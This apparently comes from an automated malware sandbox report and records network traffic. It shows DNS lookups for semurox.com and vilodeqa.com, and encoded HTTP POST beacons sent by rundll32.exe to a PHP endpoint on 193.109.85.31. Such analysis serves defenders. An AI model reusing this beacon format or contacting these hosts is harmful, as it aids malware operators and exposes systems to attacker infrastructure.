                    Oct 6, 2024 13:25:19.713248014 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.713270903 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.713499069 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.713525057 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.713561058 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.713571072 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.713599920 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.713637114 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.713848114 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.713861942 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.713938951 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.713938951 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.713948965 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.714196920 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.714222908 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.714234114 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.714242935 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.714257002 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.714469910 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.752155066 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.752176046 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.752413988 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.752439976 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.752635002 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.752664089 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.752680063 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.752743006 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.752752066 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.752789974 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.752842903 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.753220081 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.753235102 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.753336906 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.753345966 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.753559113 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.760593891 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.760611057 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.760951042 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.760967016 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.764985085 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.799851894 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.799869061 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.799922943 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.799943924 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.799976110 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.800014973 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.800035000 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.800072908 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.800081015 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.800111055 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.800435066 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.800448895 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.800486088 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.800498009 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.800529957 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.800741911 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.800806999 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.800822020 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.801001072 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.801009893 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.801153898 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.801173925 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.801188946 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.801198006 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.801212072 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.801321983 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.839859962 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.839879036 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.840200901 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.840223074 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.840322018 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.840342045 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.840379000 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.840389967 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.840420008 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.840481043 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.847531080 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.847547054 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.847660065 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.847676039 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.851125002 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.887048960 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.887064934 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.887166023 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.887166023 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.887190104 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.887306929 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.887778044 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.887793064 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.887864113 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.887864113 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.887873888 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.888216972 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.888864994 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.888879061 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.888957024 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.888957024 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.888968945 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.889771938 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.889791012 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.889827967 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.889837980 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.889864922 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.889935017 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.889950037 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.889955997 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.889965057 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.889985085 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.890023947 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.890023947 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.930129051 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.930145979 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.930330992 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.930352926 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.930365086 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.930387020 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.930448055 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.930448055 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.930459976 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.930563927 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:19.938467026 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:19.938524008 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:20.143400908 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:20.143513918 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:20.571548939 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:20.572957993 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:21.407397032 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:21.407450914 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:23.071405888 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:23.071465015 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:25.659812927 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:25.659842014 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:25.659859896 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:25.659948111 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:25.659955025 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:25.659965038 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:25.660017014 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:25.660021067 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:25.660063982 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:25.660068989 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:25.660088062 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:25.660100937 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:25.660105944 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:25.660109043 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:25.660140038 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:25.660144091 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:25.660243988 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:25.660254002 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:25.660283089 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:25.660288095 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:25.660326958 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:25.660334110 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:25.660382032 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:25.660409927 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:25.660449982 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:25.660486937 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:25.660527945 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:25.867413044 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:25.867506027 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:26.299417019 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:26.299482107 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:26.485764027 CEST4976354801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:26.490998030 CEST5480149763193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:26.491131067 CEST4976354801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:26.498346090 CEST4976354801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:26.503201962 CEST5480149763193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:26.504879951 CEST4976554801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:26.509686947 CEST5480149765193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:26.509756088 CEST4976554801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:26.511256933 CEST4976554801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:26.516236067 CEST5480149765193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:26.547072887 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:26.547096014 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:26.547106028 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:26.547156096 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:26.547202110 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:26.603625059 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:26.603646994 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:26.603662968 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:26.603744030 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:26.603751898 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:26.603764057 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:26.603775978 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:26.603830099 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:26.603833914 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:26.603847980 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:26.603883028 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:26.603950024 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:27.297554970 CEST5480149763193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:27.299380064 CEST4976354801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:27.306045055 CEST5480149763193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:27.306103945 CEST4976354801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:27.328933001 CEST5480149765193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:27.330311060 CEST4976554801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:27.332763910 CEST4977154801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:27.335710049 CEST5480149765193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:27.335781097 CEST4976554801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:27.337713003 CEST5480149771193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:27.338344097 CEST4977154801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:27.339428902 CEST4977154801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:27.344302893 CEST5480149771193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:27.363704920 CEST4977254801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:27.368556023 CEST5480149772193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:27.368710995 CEST4977254801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:27.370230913 CEST4977254801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:27.374999046 CEST5480149772193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:27.506397963 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:27.533176899 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:27.589773893 CEST49710443192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:27.589807034 CEST44349710193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:28.155972958 CEST5480149771193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:28.200218916 CEST5480149772193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:28.204942942 CEST4977154801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:28.210541010 CEST5480149771193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:28.213354111 CEST4977154801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:28.313077927 CEST4977254801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:28.318527937 CEST5480149772193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:28.320898056 CEST4977254801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:32.463551998 CEST4980854801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:32.468364000 CEST5480149808193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:32.468556881 CEST4980854801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:32.469784021 CEST4980854801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:32.474631071 CEST5480149808193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:33.300898075 CEST5480149808193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:33.302316904 CEST4980854801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:33.307380915 CEST5480149808193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:33.307456970 CEST4980854801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:33.336575031 CEST4981654801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:33.341418982 CEST5480149816193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:33.341557026 CEST4981654801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:33.342725039 CEST4981654801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:33.347496033 CEST5480149816193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:34.194962025 CEST5480149816193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:34.196811914 CEST4981654801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:25:34.201920033 CEST5480149816193.109.85.31192.168.2.7
                    Oct 6, 2024 13:25:34.203176022 CEST4981654801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:27:38.330404043 CEST4999254801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:27:38.335563898 CEST5480149992193.109.85.31192.168.2.7
                    Oct 6, 2024 13:27:38.335756063 CEST4999254801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:27:38.336946964 CEST4999254801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:27:38.341751099 CEST5480149992193.109.85.31192.168.2.7
                    Oct 6, 2024 13:27:38.434024096 CEST4999354801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:27:38.438885927 CEST5480149993193.109.85.31192.168.2.7
                    Oct 6, 2024 13:27:38.438993931 CEST4999354801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:27:38.440324068 CEST4999354801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:27:38.445077896 CEST5480149993193.109.85.31192.168.2.7
                    Oct 6, 2024 13:27:39.156363964 CEST5480149992193.109.85.31192.168.2.7
                    Oct 6, 2024 13:27:39.183023930 CEST4999254801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:27:39.188405037 CEST5480149992193.109.85.31192.168.2.7
                    Oct 6, 2024 13:27:39.188572884 CEST4999254801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:27:39.246005058 CEST5480149993193.109.85.31192.168.2.7
                    Oct 6, 2024 13:27:39.258529902 CEST4999354801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:27:39.263890982 CEST5480149993193.109.85.31192.168.2.7
                    Oct 6, 2024 13:27:39.263961077 CEST4999354801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:27:44.446983099 CEST4999454801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:27:44.451895952 CEST5480149994193.109.85.31192.168.2.7
                    Oct 6, 2024 13:27:44.452478886 CEST4999454801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:27:44.453346968 CEST4999454801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:27:44.458137035 CEST5480149994193.109.85.31192.168.2.7
                    Oct 6, 2024 13:27:45.268975019 CEST5480149994193.109.85.31192.168.2.7
                    Oct 6, 2024 13:27:45.270525932 CEST4999454801192.168.2.7193.109.85.31
                    Oct 6, 2024 13:27:45.275641918 CEST5480149994193.109.85.31192.168.2.7
                    Oct 6, 2024 13:27:45.275696039 CEST4999454801192.168.2.7193.109.85.31

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Oct 6, 2024 13:25:10.936573982 CEST5148053192.168.2.71.1.1.1
                    Oct 6, 2024 13:25:11.295232058 CEST53514801.1.1.1192.168.2.7
                    Oct 6, 2024 13:25:13.957376957 CEST5051453192.168.2.71.1.1.1
                    Oct 6, 2024 13:25:14.932564020 CEST53505141.1.1.1192.168.2.7
                    Oct 6, 2024 13:25:25.957655907 CEST5837153192.168.2.71.1.1.1
                    Oct 6, 2024 13:25:26.475598097 CEST53583711.1.1.1192.168.2.7

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Oct 6, 2024 13:25:10.936573982 CEST192.168.2.71.1.1.10x2290Standard query (0)semurox.comA (IP address)IN (0x0001)false
                    Oct 6, 2024 13:25:13.957376957 CEST192.168.2.71.1.1.10xb8a2Standard query (0)vilodeqa.comA (IP address)IN (0x0001)false
                    Oct 6, 2024 13:25:25.957655907 CEST192.168.2.71.1.1.10x3a36Standard query (0)vilodeqa.comA (IP address)IN (0x0001)false

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Oct 6, 2024 13:25:11.295232058 CEST1.1.1.1192.168.2.70x2290No error (0)semurox.com193.109.85.27A (IP address)IN (0x0001)false
                    Oct 6, 2024 13:25:14.932564020 CEST1.1.1.1192.168.2.70xb8a2No error (0)vilodeqa.com193.109.85.31A (IP address)IN (0x0001)false
                    Oct 6, 2024 13:25:26.475598097 CEST1.1.1.1192.168.2.70x3a36No error (0)vilodeqa.com193.109.85.31A (IP address)IN (0x0001)false

                    HTTP Request Dependency Graph

                    • semurox.com
                    • vilodeqa.com

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.749763193.109.85.31548017404C:\Windows\SysWOW64\rundll32.exe
                    TimestampBytes transferredDirectionData
                    Oct 6, 2024 13:25:26.498346090 CEST784OUTPOST /blueoceansite/templates/docs/index.php HTTP/1.1
                    User-Agent: Microsoft-WNS/10.0
                    Host: vilodeqa.com
                    Content-Length: 581
                    Content-Type: application/x-www-form-urlencoded
                    Accept-Language: fr-CA
                    Data Raw: 64 61 74 61 3d 65 79 4a 42 62 6c 64 47 61 43 49 36 49 6a 42 73 65 6e 68 79 64 30 39 34 4e 44 52 31 4e 79 74 49 55 32 73 30 4f 58 63 39 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6b 77 54 32 46 31 4d 32 70 54 4f 56 6b 7a 56 47 74 33 4d 6d 73 35 59 57 6c 51 4c 31 52 46 50 53 49 73 49 6b 68 6b 56 6c 46 77 51 53 49 36 49 6e 6f 7a 59 6c 4e 32 51 33 56 4f 4d 33 46 78 55 79 49 73 49 6c 46 47 57 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 56 45 51 30 39 36 4d 31 68 51 49 69 77 69 55 6d 4a 76 64 43 49 36 49 6a 4a 56 4c 32 78 30 5a 33 56 30 4b 30 70 78 64 53 49 73 49 6c 4e 69 57 6c 64 75 57 43 49 36 49 6e 5a 71 55 30 64 36 57 44 64 4d 49 69 77 69 57 57 74 4b 56 79 49 36 57 79 49 78 52 30 68 6a 49 6c 30 73 49 6d 4e 6d 53 31 67 69 4f 69 4a 31 5a 7a 30 39 49 69 77 69 61 45 35 76 64 6b 70 74 49 6a 6f 69 65 44 49 33 52 47 31 44 52 46 67 31 5a 57 4a 6c 4e 6b 5a 45 4e 7a 46 79 5a 6a 49 35 55 32 68 44 59 33 6c 76 55 44 4a 52 61 30 77 76 5a 45 68 6f 63 48 4e 77 56 57 35 6a 51 56 70 33 4b 7a 42 47 61 31 49 30 50 53 49 73 49 [TRUNCATED]
                    Data Ascii: data=eyJBbldGaCI6IjBsenhyd094NDR1NytIU2s0OXc9IiwiRnN0TCI6InkwT2F1M2pTOVkzVGt3Mms5YWlQL1RFPSIsIkhkVlFwQSI6InozYlN2Q3VOM3FxUyIsIlFGWnlpaVVYWSI6InVEQ096M1hQIiwiUmJvdCI6IjJVL2x0Z3V0K0pxdSIsIlNiWlduWCI6InZqU0d6WDdMIiwiWWtKVyI6WyIxR0hjIl0sImNmS1giOiJ1Zz09IiwiaE5vdkptIjoieDI3RG1DRFg1ZWJlNkZENzFyZjI5U2hDY3lvUDJRa0wvZEhocHNwVW5jQVp3KzBGa1I0PSIsIm9CdU1VdSI6IjZITFlremliMHJ5ViIsInN0dVkiOiJ0akdPekE9PSIsInZvSmMiOiIrRy85bmc9PSIsIndBY0giOiJ5R25abkNETW1mL1FteEc1Iiwid1FlUkgiOiJ1RFNYdnlXTCIsInhlQ2NqUyI6InoyVGFsQ0k9IiwieWlpVVhZIjoielRycnFpV1IwNkNKMkdQYXl1ejE5MVpHWnpVdCtVZFpwNDNpdEtRUjE0cz0ifQ==
                    Oct 6, 2024 13:25:27.297554970 CEST218INHTTP/1.1 200 OK
                    Date: Sun, 06 Oct 2024 11:25:27 GMT
                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                    X-Powered-By: PHP/8.2.12
                    Content-Length: 20
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 56 58 59 77 49 6e 30 3d
                    Data Ascii: eyJUUGQiOiI3VXYwIn0=


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.749765193.109.85.31548017520C:\Windows\SysWOW64\rundll32.exe
                    TimestampBytes transferredDirectionData
                    Oct 6, 2024 13:25:26.511256933 CEST784OUTPOST /blueoceansite/templates/docs/index.php HTTP/1.1
                    User-Agent: Microsoft-WNS/10.0
                    Host: vilodeqa.com
                    Content-Length: 581
                    Content-Type: application/x-www-form-urlencoded
                    Accept-Language: fr-CA
